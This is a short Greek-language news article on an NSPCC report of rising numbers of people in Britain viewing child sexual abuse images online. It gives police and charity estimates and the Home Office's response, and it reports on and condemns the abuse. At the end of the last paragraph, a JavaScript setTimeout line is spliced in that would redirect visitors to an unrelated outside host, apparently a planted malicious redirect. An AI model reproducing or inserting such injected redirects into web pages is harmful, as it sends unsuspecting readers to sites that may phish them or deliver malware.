Σοκ: Όλο και περισσότεροι Βρετανοί βλέπουν στο διαδίκτυο εικόνες σεξουαλικής κακοποίησης παιδιών

0
27

 

Δραματική αύξηση του αρθιθμού των ανδρών που μπαίνουν στο διαδίκτυο προκειμένου να δουν εικόνες σεξουαλικής κακοποίησης παιδιών σημειώνεται στη Μεγάλη Βρετανία.

Σύμφωνα με έκθεση που συνέταξε ο φιλανθρωπικός οργανισμός NSPCC, ο αριθμός αυτός θα μπορούσε να ξεπερνάει το μισό εκατομμύριο ατόμων, ενώ κάνει έκκληση για ένα «ισχυρό σχέδιο δράσης», προκειμένου να διακοπεί η παροχή του περιεχομένου στο Ίντερνετ.

Όπως αναφέρεται στην έκθεση του NSPCC, το 2013 εκτιμάται ότι υπήρχαν τουλάχιστον 50.000 άτομα στη Μεγάλη Βρετανία που συμμετείχαν στη λήψη και τον διαμοιρασμό άσεμνων εικόνων με παιδιά. Τον περασμένο μήνα οι αστυνομικές αρχές εξέφρασαν τις ανησυχίες τους ότι ο αριθμός αυτός θα μπορούσε να έχει αυξηθεί σημαντικά, ξεπερνώντας τα 100.000 άτομα.

Το υπουργείο Εσωτερικών υποστηρίζει ότι συνεργάζεται με τις αρχές επιβολής του νόμου, επιχειρήσεις και εθελοντικές οργανώσεις για την εξάλειψη της παιδικής εκμετάλλευσης.

Ωστόσο ο NSPCC υποστηρίζει ότι η πραγματική έκταση των εν λόγω αδικημάτων που διαπράττονται στη Μεγάλη Βρετανία πιθανόν είναι πολύ μεγαλύτερη από τις εκτιμήσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here